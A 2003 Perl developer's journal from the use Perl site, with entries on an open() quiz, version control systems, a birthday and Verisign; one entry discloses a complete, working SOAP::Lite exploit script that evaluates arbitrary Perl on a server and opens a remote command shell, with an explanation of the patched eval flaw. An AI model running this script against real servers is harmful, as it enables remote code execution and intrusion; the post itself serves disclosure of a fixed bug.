Stories
Slash Boxes
Comments
NOTE: use Perl; is on undef hiatus. You can read content, but you can't post it. More info will be forthcoming forthcomingly.

All the Perl that's Practical to Extract and Report

use Perl Log In

Log In

[ Create a new account ]

Journal of IlyaM (2933)

Tuesday October 14, 2003
07:09 AM

open() and pipes quiz

What is the difference between these two lines (on Linux with Perl 5.8.x or 5.6.x). More precisely why does only first open die?

open(FH, '/doesnt/exist  2>&1 |') or die "Cannot pipe: $!";

open(FH, '/doesnt/exist\\  2>&1 |') or die "Cannot pipe: $!";

Hint if you have no idea: try to remove 2>&1 from command line.

Monday October 06, 2003
04:44 AM

PerlQuotes

Link of the day: PerlQuotes. It must be converted in fortune data file!

Update: I've got email from Tina Mueller and she told me that she have added fortune data file. Cool!

Friday October 03, 2003
05:31 AM

Opensource version control systems review

Just found quite interesting review of different opensource version control systems.

As for me I'm trying to choose between Aegis and arch. I'm looking with very big suspect on subversion - my guts feeling is that subversion is too overengineered. Instead of solving real VC problems we see Apache intergration, WebDAV, binary db backend. At the end from the point of view of end user (i.e. me) it doesn't offer much more then old CVS.

P.S. And, yeah, BitKeeper rocks. But it is too expensive for us.

Wednesday September 24, 2003
03:01 AM

Overloaded abbrevs 2

Continuing my previous journal entry about XP abbrev.

Just noticed that popular Russian forum on extreme programming has now a warning on its first page which literaly translates as If you will ask questions about Windows XP we will find and kill you! :)

Friday September 19, 2003
02:54 PM

Old SOAP::Lite exploit

About year ago I announced that I have wrote SOAP::Lite exploit. I didn't publish the exploit though I promised it. Interestingly enough nobody asked me for proof - so far only Paul Kulchenko (the SOAP::Lite author) and Randy J Ray have seen it. Well, in case it is still of somebody interest I'm publishing it here:

#!/usr/bin/perl -w

# Copyright (c) 2002 by Ilya Martynov. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the same terms as Perl itself.

# This program exploits security bug in SOAP::Lite which allows any
# SOAP client call any Perl subroutine as class/object method on side
# of SOAP::Lite based SOAP server.
#
# This vulnerability have been found by stealth <stealth@segfault.net>
# and described in Phrack article 'RPC without borders':
#
#     http://www.phrack.com/show.php?p=58&a=9
#
# This program shows how to
#
# 1) evaluate any Perl code inside SOAP::Lite based server
#
# 2) access remote pseudo shell
#
# using this security bug.

use strict;

use SOAP::Lite;
use Term::ReadLine;

my($uri, $proxy) = @ARGV;
unless(defined $proxy) {
    die "Usage: $0 URI PROXY\n";
}

my $soap = connect_soap($uri, $proxy);
shell($soap);

# returns soap object
sub connect_soap {
    my $uri = shift;
    my $proxy = shift;

    my $soap = SOAP::Lite
    -> uri($uri)
    -> proxy($proxy);

    return $soap;
}

# evals any Perl code on side of SOAP::Lite based server
sub remote_eval {
    my $soap = shift;
    my $expr = shift;

    # escape Perl expression
    $expr = escape_single_quoted($expr);

    # code to run on side of SOAP::Lite server
    my $code = <<CODE;
{
    # make sure exploit works in tainted mode
    local \%ENV = \%ENV;
    (\$ENV{PATH}) = \$ENV{PATH} =~ /(.*)/;
    delete \@ENV{qw(IFS CDPATH ENV BASH_ENV)};

    # evaluate Perl code
    my \$ret = eval '$expr';
    # catch errors
    if(\$\@) { \$ret = \$\@ }
    # put result into array which will be returned to SOAP client
    \$pointer->[0] = \$ret;
}
1
CODE

    my @params = ([], $code, '[1]');

    my $som = $soap->call('X:SOAP::SOM::_traverse' => @params);

    return $som->result->[0];
}

# simple pseudo shell which allows to execute commands on side of
# SOAP::Lite based server
sub shell {
    my $soap = shift;

    my $term = new Term::ReadLine 'SOAP::Lite remote shell';
    my $OUT = $term->OUT || \*STDOUT;

    while (defined (my $cmd = $term->readline('> ')) ) {
        chomp $cmd;
        my $cmd = escape_single_quoted($cmd);
        print $OUT remote_eval($soap, "qx'$cmd'");
        $term->addhistory($cmd) if $cmd =~ /\S/;
    }
}

# escapes string which is going to be used as single quoted string
sub escape_single_quoted {
    my $string = shift;

    $string =~ s/(['\\])/\\$1/g;

    return $string;
}

How does it work? Before 0.55 it was possible to call any subroutine in any Perl packages inside of SOAP::Lite based server (at least when autodispatch is turned on). Package X:SOAP::SOM used to contain (and actually still contains subroutine _traverse):

# source code of _traverse from 0.52
sub _traverse {
  my $self = shift;
  my($pointer, $itself, $path, @path) = @_;

  if ($path && substr($path, 0, 1) eq '{') {
    $path = join '/', $path, shift @path while @path && $path !~ /}/;
  }

  my($op, $num) = $path =~ /^\[(<=|<|>=|>|=|!=?)?(\d+)\]$/ if defined $path;

  return $pointer unless defined $path;

  $op = '==' unless $op; $op .= '=' if $op eq '=' || $op eq '!';
  my $numok = defined $num && eval "$itself $op $num";
  my $nameok = (o_lname($pointer) || '') =~ /(?:^|\})$path$/ if defined $path; # name can be with namespace

  my $anynode = $path eq '';
  unless ($anynode) {
    if (@path) {
      return if defined $num && !$numok || !defined $num && !$nameok;
    } else {
      return $pointer if defined $num && $numok || !defined $num && $nameok;
      return;
    }
  }

  my @walk;
  push @walk, $self->_traverse_tree([$pointer], @path) if $anynode;
  push @walk, $self->_traverse_tree(o_child($pointer), $anynode ? ($path, @path) : @path);
  return @walk;
}

As you can see one of code paths contains a call to eval. And since we can call this subroutine directly we can bypass whatever Perl code we want to this eval. The only thing required from the exploit to work is to supply correct arguments for this subroutine to enable the code path with eval.

I hope all of you upgraded to 0.55 - after all this release which fixes the security hole exploited by this exploit was released one year ago.

09:26 AM

I'm 25 since today

My wife gave me the coolest present for my birthday - an expresso machine. Natasha, if you are reading this, thank you again :)

Update: Fix s/made present/gave present/. Thanks to jdavidboyd and phillup for free English lesson :)

03:00 AM

New release of Mail::CheckUser (thanks to Verisign)

Those idiots from Verisign are breaking internet and this breakage affected Mail::CheckUser. Rob Brown patched Mail::CheckUser to stop accepting bogus domains and I've just uploaded a new version (1.21) on CPAN.

If you use or develop any software affected by Verisign "innovations" you may find this page interesting.

In other news Verisign was sued over new VeriSign's "services". I hope Verisign will burn in hell.

Update: Those Verisign monkeys cannot even write simple search page without XSS bugs. See here (warning - explicit content). I've made a screenshot in case they fix it. Thanks to Pan T. Hose from slashdot for spoting it.

Tuesday September 16, 2003
04:13 AM

New unpublished ssh exploit?

If this is true it is quite scary.
Thursday September 11, 2003
03:53 AM

I'm fed up with SourceForge

  • Mailling list archives are being broken too often
  • Mailling list archives do not show attachments
  • Web interface to CVS and anonymous access to CVS has up to 24 hours lag

Yes, it is a free service and if I don't like it I can pack my things and go somewhere else. Well, probably I will do exactly this.

02:50 AM

Copyright on blank lines

LOL, this is really funny.